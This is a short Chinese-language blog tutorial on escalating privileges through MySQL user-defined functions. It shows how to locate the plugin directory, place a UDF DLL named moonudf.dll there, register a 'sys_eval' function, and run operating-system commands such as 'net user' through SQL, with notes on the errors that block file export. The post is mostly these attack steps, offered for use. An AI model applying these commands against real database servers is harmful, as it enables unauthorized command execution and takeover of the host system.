提权教程:mysql udf 提权

Admin 2020-07-07 79人围观 ,发现0个评论 提权教程

1、 简介


在mysql 可以使用自定义函数进行提权,udf = userdefined function 用户自定义函数

对于自定义的函数 在mysql5.1版本以后就需要放在插件插件目录/lib/plugin ,文件后缀微

dll,c语言编写

 

2、 插件目录

 

可以使用语句查询plugin插件目录

show variableslike "%plugin%"

D:\phpStudy\MySQL\lib\plugin\

 

3、 使用udf提权


导出udf

提权教程:mysql udf 提权 Web安全 第1张

 

版本有32卫 和64位的mysql udf也是一样

导出的时候出错

这种是mysql默认设置是不允许导入导出

The MySQL server is running with the --secure-file-priv option soit cannot execute this statement

这种是没有权限导出
Can't create/write to file'D:\phpStudy\MySQL\lib\plugin\moonudf.dll

查看是否存在plugin目录 没有则创建目录

权限不够


                             
2创建函数

create function sys_eval returns string soname 'moonudf.dll'

 

3 执行命令

 

select sys_eval('net user')

提权教程:mysql udf 提权 Web安全 第2张

请发表您的评论
请关注微信公众号
微信二维码
不容错过
Powered By 蚁人博客